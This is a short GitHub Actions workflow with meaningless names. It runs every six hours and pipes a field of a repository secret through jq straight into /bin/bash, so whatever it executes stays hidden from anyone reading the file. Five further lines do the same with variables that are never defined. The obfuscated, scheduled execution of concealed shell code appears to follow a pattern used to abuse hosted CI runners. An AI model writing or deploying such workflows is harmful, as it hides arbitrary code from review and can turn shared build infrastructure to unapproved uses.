name: scoldingcatnip

on:
  workflow_dispatch:
  schedule:
    - cron: '12 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: scoldingcatnip
        env:
          f73: ${{ secrets.f73 }}
        run: |
          echo $f73 | jq -r .gr91 | /bin/bash
          echo $kjkz972 | jq -r .npb0124 | /bin/bash
          echo $q43 | jq -r .euj0421 | /bin/bash
          echo $wtg88723 | jq -r .kzszl686 | /bin/bash
          echo $s76 | jq -r .joh325 | /bin/bash
          echo $vcs62899 | jq -r .tnpy2925 | /bin/bash

